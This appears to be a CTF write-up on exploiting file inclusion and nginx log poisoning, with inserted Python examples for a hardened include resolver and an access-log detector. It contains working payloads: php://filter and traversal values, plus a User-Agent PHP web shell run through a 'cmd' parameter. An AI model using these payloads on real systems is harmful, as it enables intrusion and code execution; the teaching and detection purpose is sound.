Solving the Skills Assessment: File Inclusion and Log Poisoning

Ahmet Talha Şen, published in System Weakness, 6 min read, Aug 12, 2023


Introduction

CTF challenges are designed to test your skills in various aspects of cyber security, and this particular challenge focuses on exploiting File Inclusion vulnerabilities along with Log Poisoning. We’ll use techniques like Local File Inclusion (LFI) to achieve remote code execution and eventually discover the flag.

Step 1: Identifying the Vulnerability

Upon accessing the web application, we observe that it takes a parameter called “page” in the URL.

We attempt to test for Local File Inclusion (LFI) using the following URL:

/index.php?page=php://filter/read=convert.base64-encode/resource=configure

However, it does not seem to work as intended. Next, we try another LFI payload:

/index.php?page=php://filter/read=convert.base64-encode/resource=index

This time, the payload works as expected, and we get the page source back as a base64-encoded response.

Step 2: Decoding the Response

To examine the contents of the base64-encoded response, we use a tool like CyberChef to decode it. The decoded response reveals the HTML and PHP source of the page.

I copy the encoded output and decode it with CyberChef:

<!DOCTYPE html>
<html lang="en">
<head>
<title>InlaneFreight</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Poppins:200,300,400,700,900|Display+Playfair:200,300,400,700">
<link rel="stylesheet" href="fonts/icomoon/style.css">
<link rel="stylesheet" href="css/bootstrap.min.css">
<link rel="stylesheet" href="css/magnific-popup.css">
<link rel="stylesheet" href="css/jquery-ui.css">
<link rel="stylesheet" href="css/owl.carousel.min.css">
<link rel="stylesheet" href="css/owl.theme.default.min.css">
<link rel="stylesheet" href="css/bootstrap-datepicker.css">
<link rel="stylesheet" href="fonts/flaticon/font/flaticon.css">
<link rel="stylesheet" href="css/aos.css">
<link rel="stylesheet" href="css/style.css">

</head>
<body>

<div class="site-wrap">
<div class="site-mobile-menu">
<div class="site-mobile-menu-header">
<div class="site-mobile-menu-close mt-3">
<span class="icon-close2 js-menu-toggle"></span>
</div>
</div>
<div class="site-mobile-menu-body"></div>
</div>

<header class="site-navbar py-3" role="banner">
<div class="container">
<div class="row align-items-center">

<div class="col-11 col-xl-2">
<h1 class="mb-0"><a href="index.php" class="text-white h2 mb-0">InlaneFreight</a></h1>
</div>
<div class="col-12 col-md-10 d-none d-xl-block">
<nav class="site-navigation position-relative text-right" role="navigation">
<ul class="site-menu js-clone-nav mx-auto d-none d-lg-block">
<li class="active"><a href="index.php">Home</a></li>
<li><a href="index.php?page=about">About Us</a></li>
<li><a href="index.php?page=industries">Industries</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
<?php
// echo '<li><a href="ilf_admin/index.php">Admin</a></li>';
?>
</ul>
</nav>
</div>
<div class="d-inline-block d-xl-none ml-md-0 mr-auto py-3" style="position: relative; top: 3px;"><a href="#" class="site-menu-toggle js-menu-toggle text-white"><span class="icon-menu h3"></span></a></div>
</div>
</div>
</div>

</header>

<div class="site-blocks-cover overlay" style="background-image: url(images/hero_bg_1.jpg);" data-aos="fade" data-stellar-background-ratio="0.5">
<div class="container">
<div class="row align-items-center justify-content-center text-center">
<div class="col-md-8" data-aos="fade-up" data-aos-delay="400">

<h1 class="text-white font-weight-light mb-5 text-uppercase font-weight-bold">Worldwide Freight Services</h1>
<p><a href="#" class="btn btn-primary py-3 px-5 text-white">Get Started!</a></p>
</div>
</div>
</div>
</div>
<?php
// Page router recovered from the decoded source: the only guard is a
// substring check for "..", so stream wrappers such as php://filter pass
// straight through to include().
if(!isset($_GET['page'])) {
    include "main.php";
}
else {
    $page = $_GET['page'];
    if (strpos($page, "..") !== false) {
        include "error.php";
    }
    else {
        include $page . ".php";
    }
}
?>
<footer class="site-footer">
<div class="row pt-5 mt-5 text-center">
<div class="col-md-12">
<div class="border-top pt-5">
<p>
<!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. -->
Copyright &copy;<script>document.write(new Date().getFullYear());</script> All rights reserved | This template is made with <i class="icon-heart" aria-hidden="true"></i> by <a href="https://colorlib.com" target="_blank" >Colorlib</a>
<!-- Link back to Colorlib can't be removed. Template is licensed under CC BY 3.0. -->
</p>
</div>
</div>
</footer>
</div>
<script src="js/jquery-3.3.1.min.js"></script>
<script src="js/jquery-migrate-3.0.1.min.js"></script>
<script src="js/jquery-ui.js"></script>
<script src="js/popper.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/owl.carousel.min.js"></script>
<script src="js/jquery.stellar.min.js"></script>
<script src="js/jquery.countdown.min.js"></script>
<script src="js/jquery.magnific-popup.min.js"></script>
<script src="js/bootstrap-datepicker.min.js"></script>
<script src="js/aos.js"></script>
<script src="js/main.js"></script>

</body>
</html>
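The include logic in the decoded source above guards only against a “..” substring, which is exactly why the php://filter wrapper got through. The following Python model (an added example, not the challenge's or the write-up's code) puts that check beside an allowlist plus realpath-containment check and runs both over the values quoted in this write-up; the pages directory, its files, the allowlist and the /etc/passwd input are constructed for illustration.

```python
"""Added example (not the challenge's or the write-up's code): a Python
model of the include logic in the decoded index.php, comparing its
'..' substring check with an allowlist plus realpath-containment check.
The pages directory and its files are constructed in a temp dir."""
import os
import tempfile
from typing import Dict, Optional, Tuple

# Inputs as PHP sees them in $_GET['page'] (already URL-decoded): a menu
# entry and the two payloads quoted in the write-up, plus one constructed
# absolute path.
SAMPLE_INPUTS = [
    "about",                                                   # legitimate page
    "php://filter/read=convert.base64-encode/resource=index",  # wrapper (from the page)
    "../../../../../../var/log/nginx/access.log",              # traversal (from the page)
    "/etc/passwd",                                             # constructed absolute path
]

# Assumed allowlist: the page names linked from the site menu.
ALLOWED_PAGES = {"main", "about", "industries", "contact"}


def naive_check(page: str) -> bool:
    """Mirror of the original guard: accept unless '..' occurs anywhere."""
    return ".." not in page


def contained(page: str, pages_dir: str) -> Tuple[str, bool]:
    """Pin the extension, anchor under pages_dir and resolve symlinks and '..';
    return (candidate, True) only if the result is still under pages_dir."""
    base = os.path.realpath(pages_dir)
    candidate = os.path.realpath(os.path.join(base, page + ".php"))
    return candidate, os.path.commonpath([base, candidate]) == base


def hardened_resolve(page: str, pages_dir: str) -> Optional[str]:
    """Return the file to include, or None when the request is rejected.
    Layer 1: exact allowlist match (no separators, no scheme).
    Layer 2: containment, so a loosened allowlist still cannot escape.
    Layer 3: the target must exist as a regular file."""
    if page not in ALLOWED_PAGES:
        return None
    candidate, ok = contained(page, pages_dir)
    if not ok or not os.path.isfile(candidate):
        return None
    return candidate


def build_pages_dir() -> str:
    """Constructed fixture: a directory holding one .php file per menu page."""
    d = tempfile.mkdtemp(prefix="lfi_demo_")
    for name in ALLOWED_PAGES:
        with open(os.path.join(d, name + ".php"), "w") as fh:
            fh.write("<?php // %s page ?>\n" % name)
    return d


def evaluate(pages_dir: str) -> Dict[str, Tuple[bool, bool]]:
    """Map each sample input to (naive_accepts, hardened_accepts)."""
    return {p: (naive_check(p), hardened_resolve(p, pages_dir) is not None)
            for p in SAMPLE_INPUTS}


if __name__ == "__main__":
    pages = build_pages_dir()
    for page, (naive, hard) in evaluate(pages).items():
        print(f"{page!r:60} naive={naive!s:5} hardened={hard}")
```

Run it and the naive check accepts both the wrapper string and the absolute path while rejecting only the literal traversal; the hardened resolver accepts nothing but the allowlisted name. Note that containment on its own does not reject the wrapper string (prefixing the pages directory simply turns the scheme into a non-existent subdirectory), which is why the allowlist is the first layer and the file-existence check the last.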

Step 3: Exploring the Application

The decoded source indicates that the web application belongs to a company named “InlaneFreight.” We also notice a commented-out menu entry pointing to an admin page under the “ilf_admin” directory, which looks worth exploring.

Step 4: Gathering Server Information

To gather more information, we send a curl request to the web application and check the server information in the response headers:

curl -I http://83.136.252.24:44906/
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sat, 29 Jul 2023 17:11:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.22

The response headers reveal that the server is running nginx/1.18.0, and the X-Powered-By header shows PHP/7.3.22.

Step 5: Accessing the Admin Panel

Since we discovered the “ilf_admin” directory, we attempt to access the admin panel using the following URL:

http://83.136.252.24:44906/ilf_admin/index.php

This request successfully returns the admin panel, indicating that we might have found an entry point to explore further.

Step 6: Exploring Log Files

In order to proceed, we need to find valuable log files. We suspect that the logs might contain sensitive information or potential vulnerabilities. We decide to investigate the log files by sending a GET request to the following endpoint:

GET /ilf_admin/index.php?log=system.log

To automate this process and test multiple payloads, we use Burp Intruder with a list of LFI payloads from a file named “LFI-Jhaddix.txt.”

Step 7: Log Poisoning

After running the Intruder, one of the GET requests stands out as potentially valuable. We decide to proceed with Log Poisoning using the payload from that request.

/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log

This is important:

<script src="js/jquery.js"></script>
<script type="text/javascript" src="js/bootstrap.js"></script>

Step 8: Crafting the Malicious Payload

The critical part is to get a PHP tag into the access log by placing it in the User-Agent header; when the poisoned log is then included through the “log” parameter, the tag is executed. We send the following request, with the “cmd” parameter supplying the command:

/ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=cat+/flag_dacc60f2348d.txt
User-Agent: <?php system($_GET["cmd"]); ?>

The planted code runs the “cat” command on the flag file, and its output is displayed within the included log.

Step 9: Retrieving the Flag

After crafting the payload, we send the request, and the server executes the command and returns the flag as part of the log response.
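Steps 6 to 9 leave two traces in the web server's own access log: traversal and wrapper strings in the request URI, and a PHP tag in the User-Agent field. The detector below (an added example, not part of the write-up) parses nginx combined-format lines, undoes nginx's \xHH escaping of quotes in logged fields, URL-decodes the URI and flags both patterns; the four log lines are constructed, reusing the payloads quoted above.

```python
"""Added example, not part of the write-up: scan nginx access-log lines
for the traces this assessment leaves behind (traversal / stream-wrapper
values in the URI, PHP tags in User-Agent or Referer). Log lines are
constructed; the payload strings are the ones quoted in the write-up."""
import re
from typing import Dict, List
from urllib.parse import unquote

# nginx 'combined' format: client, ident, user, [time], "request",
# status, bytes, "referer", "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# nginx writes '"' and other unsafe bytes inside logged fields as \xHH.
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})")

WRAPPER_RE = re.compile(r"(?:php|data|expect|phar|zip)://", re.I)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.I)


def unescape(field: str) -> str:
    """Reverse nginx's \\xHH escaping so the tag regexes see real quotes."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), field)


def classify(line: str) -> Dict[str, object]:
    """Parse one log line and return its findings (empty list = benign)."""
    m = LOG_RE.match(line)
    if not m:
        return {"parsed": False, "findings": ["unparsed line"]}
    request = unescape(m.group("request"))
    parts = request.split(" ")
    # Decode twice so double-encoded dots and slashes do not hide from the regexes.
    uri = unquote(unquote(parts[1] if len(parts) > 1 else request))
    findings: List[str] = []
    if TRAVERSAL_RE.search(uri):
        findings.append("path traversal in URI")
    if WRAPPER_RE.search(uri):
        findings.append("stream wrapper in URI")
    for name, value in (("user-agent", m.group("ua")), ("referer", m.group("referer"))):
        if PHP_TAG_RE.search(unescape(value)):
            findings.append(f"php tag in {name} (log poisoning)")
    return {"parsed": True, "ip": m.group("ip"), "uri": uri, "findings": findings}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    return [classify(line) for line in lines]


def suspicious_ips(results: List[Dict[str, object]]) -> List[str]:
    """Clients with at least one finding, for pivoting to other log sources."""
    return sorted({r["ip"] for r in results if r.get("parsed") and r["findings"]})


# Constructed sample log, modelled on the requests in this write-up.
SAMPLE_LOG = [
    r'10.0.0.5 - - [29/Jul/2023:17:11:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    r'10.0.0.9 - - [29/Jul/2023:17:12:30 +0000] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=index HTTP/1.1" 200 9876 "-" "Mozilla/5.0"',
    r'10.0.0.9 - - [29/Jul/2023:17:15:02 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log HTTP/1.1" 200 40211 "-" "Mozilla/5.0"',
    r'10.0.0.9 - - [29/Jul/2023:17:16:40 +0000] "GET /ilf_admin/index.php?log=../../../../../../var/log/nginx/access.log&cmd=cat+/flag_dacc60f2348d.txt HTTP/1.1" 200 40500 "-" "<?php system($_GET[\x22cmd\x22]); ?>"',
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["ip"], r["uri"], r["findings"])
    print("suspicious clients:", suspicious_ips(SAMPLE_LOG and scan(SAMPLE_LOG)))
```

Matching on the User-Agent and Referer fields after unescaping is the part that matters for this write-up: the poisoning request looks like an ordinary traversal attempt until the planted tag in the client headers is taken into account, and correlating both findings on one client IP is what separates a probe from an achieved execution attempt.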

Conclusion

By exploiting File Inclusion and Log Poisoning vulnerabilities, we successfully gained remote code execution and discovered the flag in the root directory of the web application’s file system. CTF challenges like this are excellent opportunities to test and enhance your cyber security skills, providing valuable learning experiences for real-world scenarios.

Remember, it’s essential to stay ethical and only engage in CTF challenges on platforms where such activities are explicitly permitted. Always respect the rules and guidelines of the CTF competition to ensure a fair and enjoyable experience for all participants.

Happy hacking and good luck with your future CTF endeavors!

